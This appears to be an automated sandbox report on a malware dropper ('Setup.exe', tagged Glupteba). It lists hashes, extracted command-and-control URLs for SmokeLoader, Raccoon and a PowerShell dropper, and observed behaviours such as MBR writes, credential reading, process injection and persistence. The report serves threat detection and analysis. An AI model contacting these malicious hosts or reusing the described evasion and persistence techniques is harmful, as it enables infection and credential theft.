glupteba | cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

Analysis

max time kernel
601s
max time network
605s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

4.2MB
MD5

afd51e2ff7beac4d0c88d8f872d6d0d5
SHA1

185fd4793db912410de63ac7a5a3b1ac9c266b38
SHA256

cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
SHA512

eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

http://shapkishop.store/

http://lazerprojekt.store/

http://lordliness.store/

http://185.236.231.193/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

e71b51d358b75fe1407b56bf2284e3fac50c860f

Attributes

url4cnc
https://telete.in/oidmrwednesday

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 7 IoCs

Processes:

resource	yara_rule
behavioral3/memory/4800-161-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral3/memory/4800-162-0x0000000001390000-0x0000000001B92000-memory.dmp	family_glupteba
behavioral3/memory/4800-165-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral3/memory/5604-199-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral3/memory/6776-511-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral3/memory/6776-512-0x0000000005080000-0x00000000058DD000-memory.dmp	family_glupteba
behavioral3/memory/6776-515-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral3/memory/4312-103-0x0000000002830000-0x000000000285E000-memory.dmp	family_redline
behavioral3/memory/4312-105-0x00000000028A0000-0x00000000028CC000-memory.dmp	family_redline
behavioral3/memory/7044-496-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 15 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
6824	bcdedit.exe
6028	bcdedit.exe
6804	bcdedit.exe
4584	bcdedit.exe
7156	bcdedit.exe
4896	bcdedit.exe
6368	bcdedit.exe
5044	bcdedit.exe
4584	bcdedit.exe
4956	bcdedit.exe
6992	bcdedit.exe
6860	bcdedit.exe
4256	bcdedit.exe
4980	bcdedit.exe
6988	bcdedit.exe

Nirsoft 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1615014383700.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1615014383700.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1615014388341.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1615014388341.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1615014393950.exe	Nirsoft
C:\Users\Admin\AppData\Roaming\1615014393950.exe	Nirsoft

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral3/memory/1272-278-0x0000000002B00000-0x0000000002BF1000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 21 IoCs

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe1615014383700.exe1615014388341.exe1615014393950.exeThunderFW.exeMiniThunderPlatform.exe23E04C4F32EF2158.exe23E04C4F32EF2158.tmpseed.sfx.exeseed.exeF2D9.exeF914.exeFABB.exeF7C.exe10A6.exevmipgfjn.exe1CCD.exe10A6.exejfiag3g_gg.exe2615.exe

pid	process
560	C0CA61A12E4C8B38.exe
912	C0CA61A12E4C8B38.exe
3828	1615014383700.exe
968	1615014388341.exe
1320	1615014393950.exe
3964	ThunderFW.exe
2552	MiniThunderPlatform.exe
508	23E04C4F32EF2158.exe
1124	23E04C4F32EF2158.tmp
2056	seed.sfx.exe
3564	seed.exe
4132	F2D9.exe
4312	F914.exe
4376	FABB.exe
4972	F7C.exe
5016	10A6.exe
5096	vmipgfjn.exe
3920	1CCD.exe
3872	10A6.exe
4640	jfiag3g_gg.exe
4800	2615.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral3/memory/3208-539-0x0000000000400000-0x0000000000897000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 13 IoCs

Processes:

MsiExec.exeC0CA61A12E4C8B38.exeMiniThunderPlatform.exeseed.exe10A6.exe

pid	process
4048	MsiExec.exe
560	C0CA61A12E4C8B38.exe
560	C0CA61A12E4C8B38.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
2552	MiniThunderPlatform.exe
3564	seed.exe
3872	10A6.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

1CCD.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	1CCD.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

F7C.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F7C.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	F7C.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
692	ipinfo.io
694	ipinfo.io
746	ipinfo.io
276	ip-api.com
417	ipinfo.io
616	ipinfo.io
533	ipinfo.io
819	ip-api.com
363	checkip.amazonaws.com
414	ipinfo.io
524	checkip.amazonaws.com

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeMiniThunderPlatform.exeSetup.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Setup.exe

pid process

1316 Setup.exe

pid	process
1316	Setup.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

C0CA61A12E4C8B38.exe10A6.exevmipgfjn.exe

description	pid	process	target process
PID 560 set thread context of 3268	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 set thread context of 3672	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 560 set thread context of 2036	560	C0CA61A12E4C8B38.exe	firefox.exe
PID 5016 set thread context of 3872	5016	10A6.exe	10A6.exe
PID 5096 set thread context of 4568	5096	vmipgfjn.exe	svchost.exe

Drops file in Program Files directory 37 IoCs

Processes:

23E04C4F32EF2158.tmpseed.sfx.exe

description	ioc	process
File created	C:\Program Files (x86)\DTS\is-T7JOM.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\DTS\is-HCF8T.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-UL04B.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-89DO3.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-QJSJP.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-0R5JN.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-0MSCG.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-2VO12.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-H4UNJ.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-RH2MR.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-O2H81.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-70C6L.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-C8P05.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-SN7LN.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-L5RVO.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-NIC6U.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-L7QUG.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-7D8B8.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-9P9UN.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\DTS\DreamTrip.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-7RS5J.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-LA8IT.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-PKDGU.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-J92E3.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-3H477.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-FSBJ1.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\DTS\seed.sfx.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-3UCFD.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-H5QE5.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-I7NC3.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259621546	seed.sfx.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 62 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4320	4800	WerFault.exe	2615.exe
1444	4800	WerFault.exe	2615.exe
4636	4800	WerFault.exe	2615.exe
5112	4800	WerFault.exe	2615.exe
3548	4800	WerFault.exe	2615.exe
4664	4800	WerFault.exe	2615.exe
4672	4800	WerFault.exe	2615.exe
4396	4800	WerFault.exe	2615.exe
4976	4800	WerFault.exe	2615.exe
5052	4800	WerFault.exe	2615.exe
996	4800	WerFault.exe	2615.exe
4456	4800	WerFault.exe	2615.exe
4944	4800	WerFault.exe	2615.exe
3760	4800	WerFault.exe	2615.exe
5072	4800	WerFault.exe	2615.exe
5012	4800	WerFault.exe	2615.exe
4172	4800	WerFault.exe	2615.exe
4424	4800	WerFault.exe	2615.exe
5272	4800	WerFault.exe	2615.exe
5696	5604	WerFault.exe	2615.exe
5740	5604	WerFault.exe	2615.exe
5784	5604	WerFault.exe	2615.exe
5888	5604	WerFault.exe	2615.exe
5940	5604	WerFault.exe	2615.exe
6004	5604	WerFault.exe	2615.exe
6060	5604	WerFault.exe	2615.exe
6112	5604	WerFault.exe	2615.exe
4448	5604	WerFault.exe	2615.exe
3372	5604	WerFault.exe	2615.exe
5144	5604	WerFault.exe	2615.exe
5800	5528	WerFault.exe	csrss.exe
5876	5528	WerFault.exe	csrss.exe
6008	5528	WerFault.exe	csrss.exe
4480	5528	WerFault.exe	csrss.exe
4832	5528	WerFault.exe	csrss.exe
6140	5528	WerFault.exe	csrss.exe
4864	5528	WerFault.exe	csrss.exe
4392	5528	WerFault.exe	csrss.exe
5960	5528	WerFault.exe	csrss.exe
5620	5528	WerFault.exe	csrss.exe
2920	5528	WerFault.exe	csrss.exe
5872	5528	WerFault.exe	csrss.exe
3408	5528	WerFault.exe	csrss.exe
5532	5528	WerFault.exe	csrss.exe
4388	5528	WerFault.exe	csrss.exe
5140	5528	WerFault.exe	csrss.exe
5972	5528	WerFault.exe	csrss.exe
5864	5528	WerFault.exe	csrss.exe
5380	5528	WerFault.exe	csrss.exe
5368	6084	WerFault.exe	oedlylfeu4t.exe
6332	6084	WerFault.exe	oedlylfeu4t.exe
6712	6084	WerFault.exe	oedlylfeu4t.exe
6840	6084	WerFault.exe	oedlylfeu4t.exe
6512	6084	WerFault.exe	oedlylfeu4t.exe
4288	6908	WerFault.exe	Sui.com
6364	6084	WerFault.exe	oedlylfeu4t.exe
6096	6084	WerFault.exe	oedlylfeu4t.exe
3232	5528	WerFault.exe	csrss.exe
1312	5528	WerFault.exe	csrss.exe
1132	5528	WerFault.exe	csrss.exe
8432	5528	WerFault.exe	csrss.exe
304	4808	WerFault.exe	AC4D.tmp.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exeseed.exe10A6.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	10A6.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	10A6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	10A6.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5460 schtasks.exe
692 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

6564 timeout.exe
4100 timeout.exe
1172 timeout.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exe

pid process

1904 taskkill.exe
5008 taskkill.exe
7124 taskkill.exe
7040 taskkill.exe
4736 taskkill.exe
6484 TASKKILL.exe
4744 taskkill.exe

pid	process
5460	schtasks.exe
692	schtasks.exe

pid	process
6564	timeout.exe
4100	timeout.exe
1172	timeout.exe

pid	process
1904	taskkill.exe
5008	taskkill.exe
7124	taskkill.exe
7040	taskkill.exe
4736	taskkill.exe
6484	TASKKILL.exe
4744	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
